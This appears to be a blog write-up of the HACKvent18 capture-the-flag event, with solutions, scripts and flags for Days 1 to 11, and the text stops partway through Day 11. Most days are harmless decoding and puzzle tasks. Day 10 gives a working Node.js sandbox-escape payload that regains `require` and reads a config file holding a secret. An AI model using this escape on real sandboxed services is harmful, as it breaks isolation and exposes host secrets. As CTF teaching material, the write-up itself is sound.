{"id":824,"date":"2019-01-01T10:51:14","date_gmt":"2019-01-01T10:51:14","guid":{"rendered":"https:\/\/devel0pment.de\/?p=824"},"modified":"2019-01-04T14:50:17","modified_gmt":"2019-01-04T14:50:17","slug":"hackvent18-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=824","title":{"rendered":"HACKvent18 writeup"},"content":{"rendered":"

For the sixth time in a row now hacking-lab.com<\/a> carried out the annual HACKvent<\/b>. Each day from the 1st of december until the 24th a new challenge is published. I would have loved to spend more time on it, but time is a rare resource especially on the days before christmas \ud83d\ude09 After all I managed to solve 21 of 24 tasks:\n<\/p>\n\n\n\n\n\n\n\n\n\n\n
\"\"<\/td>\nEasy<\/span><\/td>\n<\/tr>\n
Day 01:<\/b> Just Another Bar Code<\/a>
\nDay 02:<\/b> Me<\/a>
\nDay 03:<\/b> Catch me<\/a>
\nDay 04:<\/b> pirating like in the 90ies<\/a>
\nDay 05:<\/b> OSINT 1<\/a>
\nDay 06:<\/b> Mondrian<\/a>
\nDay 07:<\/b> flappy.pl<\/a><\/td>\n<\/tr>\n
\"\"<\/td>\nMedium<\/span><\/td>\n<\/tr>\n
Day 08:<\/b> Advent Snail<\/a>
\nDay 09:<\/b> fake xmass balls<\/a>
\nDay 10:<\/b> >_ Run, Node, Run<\/a>
\nDay 11:<\/b> Crypt-o-Math 3.0<\/a>
\nDay 12:<\/b> SmartWishList<\/a>
\nDay 13:<\/b> flappy’s revenge<\/a>
\nDay 14:<\/b> power in the shell<\/a><\/td>\n<\/tr>\n
\"\"<\/td>\nHard<\/span><\/td>\n<\/tr>\n
Day 15:<\/b> Watch Me<\/span>
\nDay 16:<\/b> Pay 100 Bitcoins<\/a>
\nDay 17:<\/b> Faster KEy Exchange<\/a>
\nDay 18:<\/b> Be Evil<\/a>
\nDay 19:<\/b> PromoCode<\/a>
\nDay 20:<\/b> I want to play a game<\/span>
\nDay 21:<\/b> muffinCTF (Day 1)<\/a>
\nDay 22:<\/b> muffinCTF (Day 2)<\/a>
\nDay 23:<\/b> muffinCTF (Day 3)<\/a><\/td>\n<\/tr>\n
\"\"<\/td>\nFinal<\/span><\/td>\n<\/tr>\n
Day 24:<\/b> Take the red pill, take the blue pill<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

<\/p>\n

\n

Day 01: Just Another Bar Code<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: DanMcFly<\/span>
\n<\/i><\/td>\n<\/tr>\n
After a decade of monochromity, Santa has finally updated his infrastructure with color displays.

<\/p>\n

<\/p>\n

With the new color code, the gift logistic robots can now handle many more gifts:<\/p>\n

\"\"<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

As stated in the challenge’s name, the provided image contains a jab-code (J<\/b>ust A<\/b>nother B<\/b>ar Code). This kind of bar code has a greater amount of available data in comparison to a traditional qr-code since each pixel can not only be black or white but colored. Each color-channel (R<\/b>ed G<\/b>reen B<\/b>lue) can either be 0 or 255 resulting in 8 available colors: (0,0,0), (0,0,255), (0,255,0), (0,255,255), …<\/p>\n

The code can for example be scanned on https:\/\/jabcode.org\/scan<\/a>:<\/p>\n

\"\"<\/p>\n

The flag is:
\nHV18-L3ts-5t4r-7Th3-Phun-G33k<\/strong><\/span><\/p>\n

\n

Day 02: Me<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: M.G.<\/span>
\nLost in translation<\/i><\/td>\n<\/tr>\n
Can you help Santa decoding these numbers?\n
115 112 122 127 113 132 124 110 107 106 124 124 105 111 104 105 115 126 124 103 101 131 124 104 116 111 121 107 103 131 124 104 115 122 123 127 115 132 132 122 115 64 132 103 101 132 132 122 115 64 132 103 101 131 114 113 116 121 121 107 103 131 124 104 115 122 123 127 115 63 112 101 115 106 125 127 131 111 104 103 115 116 123 127 115 132 132 122 115 64 132 103 101 132 132 122 115 64 132 103 101 131 114 103 115 116 123 107 113 111 104 102 115 122 126 107 127 111 104 103 115 116 126 103 101 132 114 107 115 64 131 127 125 63 112 101 115 64 131 127 117 115 122 101 115 106 122 107 107 132 104 106 105 102 123 127 115 132 132 122 116 112 127 123 101 131 114 104 115 122 124 124 105 62 102 101 115 106 122 107 107 132 104 112 116 121 121 107 117 115 114 110 107 111 121 107 103 131 63 105 115 126 124 107 117 115 122 101 115 106 122 107 113 132 124 110 107 106 124 124 105 111 104 102 115 122 123 127 115 132 132 122 115 64 132 103 101 131 114 103 115 116 123 107 117 115 124 112 116 121 121 107 117 115 114 110 107 111 121 107 103 131 63 105 115 126 124 107 117 115 122 101 115 106 122 107 107 132 104 106 105 102 121 127 105 132 114 107 115 64 131 127 117 115 122 101 115 112 122 127 111 132 114 107 105 101 75 75 75 75 75 75\n<\/pre>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Step 1: octal -> ASCII<\/b><\/p>\n
The numbers are represented in octal and can be converted to ASCII e.g. using https:\/\/www.browserling.com\/tools\/octal-to-text<\/a>:<\/p>\n
\"\"<\/p>\n
Step 2: base32 decode<\/b><\/p>\n
The resulting string is base32 encoded and can be decoded e.g. using https:\/\/emn178.github.io\/online-tools\/base32_decode.html<\/a>:<\/p>\n
\"\"<\/p>\n
Step 3: 14-segment decode<\/b><\/p>\n
The next string took me some time. Each word in the string represents one cipher\/letter in a 14-segment display and can be decoded e.g. using http:\/\/kryptografie.de\/kryptografie\/chiffre\/14-segment.htm<\/a>:<\/p>\n
\"\"<\/p>\n
Alternatively the following python script does each of the mentioned steps:<\/p>\n\n
\n#!\/usr\/bin\/env python\nimport base64\n\n# step1 : octal -> ASCII\n\nf = open('numbers.txt')\nnums = f.read().split(' ')\nf.close()\n\nres1 = ''\nfor num in nums:\n  res1 += chr(int(num, 8))\n\nprint('result 1')\nprint('--------')\nprint(res1 + '\\n')\n\n\n# step 2: base32 decode\n\nres2 = base64.b32decode(res1)\nprint('result 2')\nprint('--------')\nprint(res2 + '\\n')\n\n\n# step 3: 14-segment decode\n\nsegwords = res2.split(' ')\nline1 = ''\nfor segword in segwords: line1 += ' ---  ' if ('a' in segword) else '      '\nline2 = ''\nfor segword in segwords:\n  line2 += '|' if ('f' in segword) else ' '\n  line2 += '\\\\' if ('h' in segword) else ' '\n  line2 += '|' if ('i' in segword) else ' '\n  line2 += '\/' if ('j' in segword) else ' '\n  line2 += '|' if ('b' in segword) else ' '\n  line2 += ' '\nline3 = ''\nfor segword in segwords:\n  line3 += ' - ' if ('g1' in segword) else '   '\n  line3 += '-  ' if ('g2' in segword) else '   '\nline4 = ''\nfor segword in segwords:\n  line4 += '|' if ('e' in segword) else ' '\n  line4 += '\/' if ('k' in segword) else ' '\n  line4 += '|' if ('l' in segword) else ' '\n  line4 += '\\\\' if ('m' in segword) else ' '\n  line4 += '|' if ('c' in segword) else ' '\n  line4 += ' '\nline5 = ''\nfor segword in segwords: line5 += ' ---  ' if ('d' in segword) else '      '\n\nprint('result 3')\nprint('--------')\nprint(line1)\nprint(line2)\nprint(line3)\nprint(line4)\nprint(line5)\n<\/pre><\/div>\n\n
Running the script yields the flag (not quite as good readable as using the online converter):\n<\/p>\n
user@host:~$ .\/day02.py\nresult 1\n--------\nMJRWKZTHGFTTEIDEMVTCAYTDNIQGCYTDMRSWMZZRM4ZCAZZRM4ZCAYLKNQQGCYTDMRSWM3JAMFUWYIDCMNSWMZZRM4ZCAZZRM4ZCAYLCMNSGKIDBMRVGWIDCMNVCAZLGM4YWU3JAM4YWOMRAMFRGGZDFEBSWMZZRNJWSAYLDMRTTE2BAMFRGGZDJNQQGOMLHGIQGCY3EMVTGOMRAMFRGKZTHGFTTEIDBMRSWMZZRM4ZCAYLCMNSGOMTJNQQGOMLHGIQGCY3EMVTGOMRAMFRGGZDFEBQWEZLGM4YWOMRAMJRWIZLGEA======\n\nresult 2\n--------\nbcefg1g2 def bcj abcdefg1g2 g1g2 ajl abcdefm ail bcefg1g2 g1g2 abcde adjk bcj efg1jm g1g2 abcde efg1jm acdg2h abcdil g1g2 acdefg2 abefg1g2 adefg1g2 abcdg2il g1g2 acdefg2 abcde abefg1g2 bcdef\n\nresult 3\n--------\n                   ---         ---   ---   ---               ---   ---                     ---         ---   ---         ---   ---   ---   ---         ---   ---   ---\n|   | |        \/| |   |          \/  |   |   |   |   |           |    \/     \/| |  \/            | |  \/   \\      | |       |     |   | |       | |       |         | |   | |   |\n - -               - -   - -                     - -   - -                     -     - -         -       -         - -     -   - -   - -     -   - -     -         - -\n|   | |         | |   |         |   |  \\|   |   |   |       |   |  \/        | |  \\        |   | |  \\      |   | |       |   | |     |       | |       |   | |   | |     |   |\n       ---         ---               ---                     ---   ---                     ---         ---   ---         ---         ---   ---         ---   ---         ---\n<\/pre>\n
The flag is:
\nHL18-7QTH-JZ1K-JKSD-GPEB-GJPU<\/strong><\/span><\/p>\n
\n
Day 03: Catch me<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: inik<\/span>
\n… if you can<\/i><\/td>\n<\/tr>\n
To get the flag, just press the button
<\/p>\n
<\/p>\n
Catch me!<\/a><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The challenge provides a link to the following page:<\/p>\n
\"\"<\/p>\n
The “Get the flag” button is changing is position if you try to click it.<\/p>\n
Pressing CTRL+U<\/i> opens up the source-code view (chrome) containing the involved javascript:<\/p>\n
\"\"<\/p>\n
Simply copy-\/pasting the javascript code to a javascript beautifier like https:\/\/beautifier.io\/<\/a> displays the flag in plaintext:<\/p>\n
\"\"<\/p>\n
The flag is:
\nHV18-pFAT-O1Dl-HjVp-jJNE-Zju8<\/strong><\/span><\/p>\n
\n
Day 04: pirating like in the 90ies<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: HaRdLoCk<\/span>
\nAhoy, my name is Santa and I want to be a pirate!<\/i><\/td>\n<\/tr>\n
go to the pirates!<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The link leads to the following page displaying 12 different faces with an country name and an input field beneath each of it:<\/p>\n
\"\"<\/p>\n
The page contains the following javascript:\n<\/p>\n\n
\n<script>\n  function JollyRoger() {\n    \n    var elements = document.getElementsByTagName("input")\n    for (var i = 0; i < elements.length; i++) {\n      if(elements[i].value == "") {\n        alert('ahoy pirate! \\n\\nyou want jolly roger? i see empty boxes :-\/');\n        return;\n      }\n    }\n    \n    var a, b;\n    p=document.getElementById('pirate01').value+document.getElementById('pirate02').value+document.getElementById('pirate03').value+\n    document.getElementById('pirate04').value+document.getElementById('pirate05').value+document.getElementById('pirate06').value+\n    document.getElementById('pirate07').value+document.getElementById('pirate08').value+document.getElementById('pirate09').value+\n    document.getElementById('pirate10').value+document.getElementById('pirate11').value+document.getElementById('pirate12').value;\n    s='::)"<.vd]!&a{\u0016":r>Qyh 7\u0013';\n    f='HV18-';\n    for (i=0; i < s.length;i++) {\n      a = s.charCodeAt(i);       \n      b = p.substring(i*2, i*2+2);\n      f+=(String.fromCharCode(a ^ b));\n    }\n    alert(f);\n  }\n  \n<\/script>\n<\/pre><\/div>\n\n
The variable p<\/i> contains the concatenation of all input fields, while s<\/i> contains the encrypted flag. In each iteration of the for-loop, 2 characters from p<\/i> are taken and XORed with a byte of the encrypted flag stored in s<\/i>. Because of the length of the flag each input field is probably supposed to contain 4 ciphers (which possibly could be a date).<\/p>\n
At first I tried to derive the correct ciphers by determining the dashes (–<\/i>) within the flag. Although this yields 2 ciphers of 4 input fields (since there are 4 dashes within the flag), it does not suffice to reconstruct the flag.<\/p>\n
Googling for the first three country names Nebraska<\/i>, Tortuag<\/i> and Antigua<\/i> lead me to a wikipedia article<\/a> mentioning the computer game The Secret of Monkey Island<\/a>. Googling a little bit further I found the following page<\/a> containing the code wheel, which has been used as a copy-protection:<\/p>\n
\"\"<\/p>\n
This is obviously a hit! \ud83d\ude42<\/p>\n
Rotating the wheel to fit the faces on the challenge-page and copying the number displayed beneath the appropriate country name yields the correct flag:<\/p>\n
\"\"<\/p>\n
The flag is:
\nHV18-5o9x-4geL-7hkJ-wc4A-xp8F<\/strong><\/span><\/p>\n
\n
Day 05: OSINT 1<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: DanMcFly featuring the awesome R.R.<\/span>
\nIt’s all about transparency<\/i><\/td>\n<\/tr>\n
Santa has hidden your daily present on his server, somewhere on port 443.
<\/p>\n
<\/p>\n
Start on https:\/\/www.hackvent.org and follow the OSINT traces.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The website hosted on https:\/\/www.hackvent.org<\/a> states that there is another virtual host on the webserver providing the flag:<\/p>\n
\"\"<\/p>\n
Reconsidering the challenge description (It’s all about transparency<\/i>) in combination with port 443<\/i> reminded me of the term Certificate Transparency<\/i> (CT<\/i>) I lately read about. CT basically is a public log containing digitally signed entries of the activites of all certificate authorities (CAs). The goal of CT is to detect erroneously or maliciously issued certifcates for a domain (CT on wikipedia<\/a>).<\/p>\n
The CT log can be searched for example on https:\/\/transparencyreport.google.com\/https\/certificates<\/a>. By searching for hackvent.org<\/i> and selecting Include subdomains<\/i> we get a list of all issued certificates for this domain:<\/p>\n
\"\"<\/p>\n
Browsing to osintiscoolisntit.hackvent.org<\/a> yields the flag:<\/p>\n
\"\"<\/p>\n
The flag is:
\nHV18-0Sin-tI5S-R34l-lyC0-oo0L<\/strong><\/span><\/p>\n
\n
Day 06: Mondrian<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: xorkiwi<\/span>
\n<\/i><\/td>\n<\/tr>\n
Piet’er just opened his gallery to present his pieces to you, they’d make for a great present \ud83d\ude42
<\/p>\n
<\/p>\n
open gallery!<\/a><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The provided link leads to the Piet’ers Gallery showing 6 different pictures:<\/p>\n
\"\"<\/p>\n
If you have ever seen a picture like this before, it is easy to identify it as an input image for the esoteric programming language Piet<\/a>. The images can be interpretated for example on npiet online<\/a>.<\/p>\n
Running the first image (“House”<\/i>) yields the string HV18<\/i>:<\/p>\n
\"\"<\/p>\n
Respectively the other images produce the following output:<\/p>\n
Tree : M4ke
\nLake : S0m3
\nSky : R3Al
\nSheep: N1c3
\nSnake: artZ<\/p>\n
Concatenating those strings (inserting the separating dashes) results in the flag:
\nHV18-M4ke-S0m3-R3Al-N1c3-artZ<\/strong><\/span><\/p>\n
\n
Day 07: flappy.pl<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: M.<\/span>
\n<\/i><\/td>\n<\/tr>\n
Time for a little game. It’s hardy obfuscated, i promise … \ud83d\ude09
<\/p>\n
<\/p>\n
get flappy<\/a><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The provided file contains some obfuscated perl-code:\n<\/p>\n\n
\nuse Term::ReadKey; sub k {ReadKey(-1)}; ReadMode 3;\nsub rk {$Q='';$Q.=$QQ while($QQ=k());$Q}; $|=1;\nprint "\\ec\\e[0;0r\\e[4242;1H\\e[6n\\e[1;1H";\n($p .= $c) until (($c=k()) eq 'R'); $x=75;$dx=3;\n(($yy) = ($p =~ \/(\\d+);\/))&&($yy-=10);\nprint (("\\r\\n\\e[40m\\e[37m#".(' 'x78)."#")x100);\n$r=(sub {$M=shift; sub {$M=(($M*0x41C64E6D)+12345)&0x7FFFFFFF;$M%shift;}})\n->(42);$s=(sub {select($HV18, $faLL, $D33p, shift);});$INT0?$H3ll:$PERL;\n@HASH=unpack("C*",pack("H*",'73740c12387652487105575346620e6c55655e1b4b6b6f541a6b2d7275'));\nfor $i(0..666){$s->(0.1);print("\\e[40;91m\\e[${yy};${x}H.");\n$dx += int(rk() =~ \/ \/g)*2-1; $dx = ($dx>3?3:($dx<-3?-3:$dx));\n$x += $dx; ($x>1&&$x<80)||last;\n(($i%23)&&print ("\\e[4242;1H\\n\\e[40m\\e[37m#".(' 'x78)."#"))||\n(($h=20+$r->(42))&&(print ("\\e[4242;1H\\n\\e[40m\\e[37m#".\n((chr($HASH[$i\/23]^$h))x($h-5)).(" "x10).((chr($HASH[$i\/23]^$h))x(73-$h))."#")));\n(($i+13)%23)?42:((abs($x-$h)<6)||last);\nprint ("\\e[${yy};${x}H\\e[41m\\e[37m@");\n}; ReadMode 1;###################-EOF-flappy.pl###############\n<\/pre><\/div>\n\n
Running the file with perl turns out that this is a small flappy bird clone:<\/p>\n
\"\"<\/p>\n
As can be seen in the screenshot above, the walls, which have to be passed by, obviously contain single letters of the flag.<\/p>\n
Since finshing the game until the last letter is displayed seems to be quite challenging, we should search a way to patch the perl-script to print all letters of the flag independent of your gaming skills.<\/p>\n
After playing around a little bit with the code, I figured out that it suffices to clear out the two ||last<\/i> statements within the for-loop since this is the game’s main-loop and the last<\/i> statement aborts the execution of the loop if a wall is hit (like break<\/i> in a lot of other languages).<\/p>\n
The adjusted part of the perl-code:\n<\/p>\n\n
\n...\n$x += $dx; ($x>1&&$x<80);\n...\n<\/pre><\/div>\n\n
\n...\n(($i+13)%23)?42:((abs($x-$h)<6));\n...\n<\/pre><\/div>\n\n
With this little adjustment the program keeps running even if the wall is hit printing the whole flag:<\/p>\n
The flag is:
\nHV18-bMnF-racH-XdMC-xSJJ-I2fL<\/strong><\/span><\/p>\n
\n
Day 08: Advent Snail<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: otaku<\/span>
\n<\/i><\/td>\n<\/tr>\n
In cyberstan there is a big tradition to backe advents snails during advent.
<\/p>\n
<\/p>\n
\"\"<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The provided image is obviously a messed up qr-code. The sticking point is how to rearrange the single dots to form a valid qr-code. Since the challenge’s title as well as the description mention the word snail<\/i>, the qr-code can probably be reconstructed by reading the image in a spiral.<\/p>\n
In a qr-code of the size 25×25 the first line should start with 7 black dots. Taking this into account we can start from the inner within the image wrapping up the qr-code:<\/p>\n
\"\"<\/p>\n
The only thing left to do is to write a python-script, which reads the image into a two-dimensional array and generates a new image printing out the dots in a spiral as displayed in the above image.<\/p>\n
The following quick-and-dirty python-script does this \ud83d\ude42<\/p>\n
Note: I read the pixels with a absolute offset from the following cutout of the original image:<\/i><\/p>\n
\"\"\n<\/p>\n\n
\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\ndots = [16,22,29,35,42,48,54,60,67,74,80,86,92,99,106,111,118,124,131,138,143,150,156,162,170]\n\nimg = Image.open('4dv3ntSn4il2.png')\npix = img.load()\n\n# create two-dimensional array (0 = white, 1 = black)\narr = []\nfor y in dots:\n  arr.append([])\n  for x in dots:\n    if (pix[x,y] == (0,0,0,255)): arr[len(arr)-1].append(1)\n    else: arr[len(arr)-1].append(0)\n\nim2 = Image.new(\"RGB\", (31,31), \"white\")\npix2 = im2.load()\n\n# we want to start in the center of the image\nx = 12\ny = 12\n\n# the inital step-size is 1\nstepSize = 1\n\n# we havn't done any steps yet\nsteps = 0\n\n# in each step we either go up (0,-1), down (0,1), left(-1,0) or right(1,0)\ndx = 0\ndy = -1\n\n# we want to store the final qr-code in the array 'out'\nout = []\n\n# there are 25 dots in each column\nfor i in range(25):\n  out.append([])\n  # also, there are 25 dots in each row\n  for j in range(25):\n    out[i].append(arr[y][x])\n    # 1 means we got a black pixel (the base-color of the image is white)\n    if (arr[y][x] == 1): pix2[j+3,i+3] = (0,0,0)\n    # take the next step\n    x += dx\n    y += dy\n    # we took the nex step\n    steps += 1\n    # already reached the step-size?\n    if (steps == stepSize):\n      # we moved on the y-axis: change direction, reset steps\n      if (dx == 0):\n        dx = -dy\n        dy = 0\n        steps = 0\n      # we moved on the x-axis: change direction, reset steps and increase step-size\n      else:\n        dy = dx\n        dx = 0\n        steps = 0\n        stepSize += 1\n\n# save final output to 'out.png'\nim2.save('out.png')\n<\/pre><\/div>\n\n
The resulting image (out.png<\/i>) contains the valid qr-code:<\/p>\n
\"\"<\/p>\n
Scanning it yields the flag:
\nHV18-$$nn-@@11-LLr0-B1ne<\/strong><\/span><\/p>\n
\n
Day 09: fake xmass balls<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: M.<\/span>
\n<\/i><\/td>\n<\/tr>\n
A rogue manufacturer is flooding the market with counterfeit yellow xmas balls.They are popping up like everywhere!
<\/p>\n
<\/p>\n
Can you tell them apart from the real ones? Perhaps there is some useful information hidden in the fakes…<\/p>\n
\"\"<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
We basically got two images. The original medium_64.png<\/i> at https:\/\/hackvent.hacking-lab.com\/img\/medium_64.png<\/i>:<\/p>\n
\"\"<\/p>\n
As well as the fake medium_64.png<\/i> from the challenge at https:\/\/hackvent.hacking-lab.com\/medium-64.png<\/i>:<\/p>\n
\"\"<\/p>\n
I started by comparing the filestructure of both images using exiftool<\/i>, pngcheck<\/i> and binwalk<\/i>. Although they differ, it did not seem like there are hidden any useful information.<\/p>\n
At next I compared the actual RGBA-values of each pixel using the following python script:\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day09# cat compare.py\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nim = Image.open('medium-64-fake.png')\npx = im.load()\n\nim2 = Image.open('medium_64.png')\npx2 = im2.load()\n\nfor i in range(64):\n  for j in range(64):\n    r = px[i,j][0] - px2[i,j][0]\n    g = px[i,j][1] - px2[i,j][1]\n    b = px[i,j][2] - px2[i,j][2]\n    a = px[i,j][3] - px2[i,j][3]\n    if (r != 0): print(\"R-value differs (\"+str(r)+\") at [\"+str(i)+\",\"+str(j)+\"]\")\n    if (g != 0): print(\"G-value differs (\"+str(g)+\") at [\"+str(i)+\",\"+str(j)+\"]\")\n    if (b != 0): print(\"B-value differs (\"+str(b)+\") at [\"+str(i)+\",\"+str(j)+\"]\")\n    if (a != 0): print(\"A-value differs (\"+str(a)+\") at [\"+str(i)+\",\"+str(j)+\"]\")\n<\/pre><\/div>\n\n
Running the script ….\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day09# .\/compare.py\nG-value differs (1) at [20,27]\nG-value differs (-1) at [20,29]\nG-value differs (-1) at [20,32]\nG-value differs (1) at [20,33]\nG-value differs (1) at [20,34]\nG-value differs (1) at [20,36]\nG-value differs (-1) at [20,37]\nG-value differs (-1) at [21,21]\nG-value differs (1) at [21,22]\nG-value differs (-1) at [21,23]\nG-value differs (-1) at [21,24]\nG-value differs (-1) at [21,25]\nG-value differs (1) at [21,27]\n...\n<\/pre><\/div>\n\n
… revealed that only the G-value differs by one (+1\/-1) in 313 pixels.<\/p>\n
That’s probably not a coincidence. So let’s simply create a new image highlighting those pixels by setting them to black:\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day09# cat genImage.py\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nim = Image.open('medium-64-fake.png')\npx = im.load()\n\nim2 = Image.open('medium_64.png')\npx2 = im2.load()\n\nim3 = Image.new('RGB', (64,64), 'white')\npx3 = im3.load()\n\nfor i in range(64):\n  for j in range(64):\n    g = px[i,j][1] - px2[i,j][1]\n    if (g == 0): px3[i,j] = (0,0,0)\n\nim3.save('out.png')\n<\/pre><\/div>\n\n
The resulting image (out.png<\/i>) is a qr-code:<\/p>\n
\"\"<\/p>\n
To get rid of the black border around the qr-code we adjust the condition a little bit:\n<\/p>\n\n
\n...\n    if (g == 0 and i>19 and i<45 and j>19 and j<45): px3[i,j] = (0,0,0)\n...\n<\/pre><\/div>\n\n
Now we get a smooth qr-code which can be scanned properly:<\/p>\n
\"\"<\/p>\n
The flag is:
\nHV18-PpTR-Qri5-3nOI-n51a-42gJ<\/strong><\/span><\/p>\n
\n
Day 10: >_ Run, Node, Run<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: zanidd<\/span>
\n<\/i><\/td>\n<\/tr>\n
Santa has practiced his nodejs skills and wants his little elves to practice it as well, so the kids can get the web- app they wish for.
<\/p>\n
<\/p>\n
He made a little practice- sandbox for his elves. Can you break out?<\/p>\n
Location: http:\/\/whale.hacking-lab.com:3000\/<\/a><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The provided link leads to the following website:<\/p>\n
\"\"<\/p>\n
The See the code!<\/i> link at the bottom of the page shows the source code of the nodejs-application:\n<\/p>\n\n
\nconst {flag, port} = require(".\/config.json");\nconst sandbox = require("sandbox");\nconst app = require("express")();\n\napp.use(require('body-parser').urlencoded({ extended: false }));\n\napp.get("\/", (req, res) => res.sendFile(__dirname+"\/index.html"));\napp.get("\/code", (req, res) => res.sendFile(__filename));\n\napp.post("\/run", (req, res) => {\n\n  if (!req.body.run) {\n    res.json({success: false, result: "No code provided"});\n    return;\n  }\n\n  let boiler = "const flag_" + require("randomstring").generate(64) + "=\\"" + flag + "\\";\\n";\n\n  new sandbox().run(boiler + req.body.run, (out) => res.json({success: true, result: out.result}));\n\n});\n\napp.listen(port);\n<\/pre><\/div>\n\n
The flag is read into a const variable called flag<\/i> from the file .\/config.json<\/i> (line 1).<\/p>\n
The flag variable is then used to build up a string (boiler<\/i>) assigning the content of it to a variable called flag_<\/i> followed by 64 random-characters (line 17). This string is passed along with req.body.run<\/i> (which contains the code we can entered in the textarea on the website) to the run<\/i> method of the sandbox.<\/p>\n
Since the name of the flag_???<\/i> variable is generated randomly it cannot be referenced directly. So I started by trying to print the global scope containing the variable. This did not succeed, because it is a const variable, which is not added to this<\/i> as it would have been the case if it was defined as flag_??? = flag;<\/i>. A quick example shows the problem:\n<\/p>\n\n
\nInput: x = 3;this\nOutput: { console: {}, process: { stdout: {} }, x: 3 }  \/\/ this contains 'x'\n\nInput: const x = 3;this\nOutput: { console: {}, process: { stdout: {} } }        \/\/ this does NOT contain 'x'\n<\/pre><\/div>\n\n
As I did not find a way to read the flag_???<\/i> variable this way, I started googling for escaping nodejs sandboxes and stumbled upon the following link: https:\/\/github.com\/patriksimek\/vm2\/issues\/32<\/a>.<\/p>\n
The second post proposes the following code to renable the require-statement, which is not suposed to be working in the sandbox:\n<\/p>\n\n
\nconst ForeignFunction = this.constructor.constructor;\nconst process1 = ForeignFunction(\"return process\")();\nconst require1 = process1.mainModule.require;\n...\n<\/pre><\/div>\n\n
Using this we can easily print the contents of the file .\/config.json<\/i>, which contains the flag:\n<\/p>\n\n
\nconst require1 = ((this.constructor.constructor)(\"return process\")()).mainModule.require;\nrequire1(\".\/config.json\");\n<\/pre><\/div>\n\n
\"\"<\/p>\n
The flag is:
\nHV18-YtH3-S4nD-bx5A-Nt4G<\/strong><\/span><\/p>\n
\n
Day 11: Crypt-o-Math 3.0<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: Lukasz_D<\/span>
\n<\/i><\/td>\n<\/tr>\n
Last year’s challenge was too easy? Try to solve this one, you h4x0r!
<\/p>\n
<\/p>\n
c = (a * b) % p
\nc=0x7E65D68F84862CEA3FCC15B966767CCAED530B87FC4061517A1497A03D2
\np=0xDD8E05FF296C792D2855DB6B5331AF9D112876B41D43F73CEF3AC7425F9
\nb=0x7BBE3A50F28B2BA511A860A0A32AD71D4B5B93A8AE295E83350E68B57E5<\/p>\n
finding “a” will give you the flag.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The task is basically similar to the Crypt-o-Math 2.0<\/i> challenge from last year (HACKvent17 Day11<\/a>).<\/p>\n
Similar to last year the equation can for example be solved by using an online equation solver like  https:\/\/www.dcode.fr\/modular-equation-solver<\/a>. Another way is to use gmpy2<\/i> for python (see solution from mcia<\/i> in the offical writeup for HACKvent2017<\/a>):\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day11# cat h.py \n#!\/usr\/bin\/env python\n\nimport gmpy2\n\nc = 0x7E65D68F84862CEA3FCC15B966767CCAED530B87FC4061517A1497A03D2\np = 0xDD8E05FF296C792D2855DB6B5331AF9D112876B41D43F73CEF3AC7425F9\nb = 0x7BBE3A50F28B2BA511A860A0A32AD71D4B5B93A8AE295E83350E68B57E5\n\ninv = gmpy2.invert(b,p)\na = c * inv % p\n\nprint(a)\nprint(hex(a))\na = hex(a).lstrip(\"0x\")\nprint(str(a).decode('hex'))\n<\/pre><\/div>\n\n
Running the script:\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day11# .\/solveEquation.py \n31203092237148810178812127507761703323636375061497699755717548622982799\n0x485631382d4288bb2cdf615fc4576b25ba2ee4c74f5e8598ba6bbdfae8f\nTraceback (most recent call last):\n  File \".\/h.py\", line 16, in \n    print(str(a).decode('hex'))\n  File \"\/usr\/lib\/python2.7\/encodings\/hex_codec.py\", line 42, in hex_decode\n    output = binascii.a2b_hex(input)\nTypeError: Odd-length string\n<\/pre><\/div>\n\n
Huh? The resulting value for a<\/i> obviously begins with ‘HV18-‘ (0x485631382d)<\/i>, but its length is odd. Also the following hex-values after ‘HV18-‘<\/i> does not really make sense: ..4288bb2cdf = ..B\\x88\\xbb,\\df<\/i>. Let’s reconsider the equation:\n<\/p>\n
c = (a * b) % p<\/pre>\n
Obviously there are more solutions for a<\/i> to fulfill the equation. As we already have a solution (our odd-length hex string), we can produce more solutions by simply adding n * p<\/i> to it. The equation will stay valid since the multiple of p<\/i> is truncated by the modulo operation:\n<\/p>\n
c = ((a+n*p) * b) % p<\/pre>\n
So let’s loop over possible values for n<\/i>:\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day11# cat loopN.py\n#!\/usr\/bin\/env python\n\na = 0x485631382d4288bb2cdf615fc4576b25ba2ee4c74f5e8598ba6bbdfae8f\np = 0xDD8E05FF296C792D2855DB6B5331AF9D112876B41D43F73CEF3AC7425F9\nx = 0\n\nwhile True:\n  x +=1\n  a += p\n  print(hex(a) + \"(\"+str(x)+\")\")\n<\/pre><\/div>\n\n
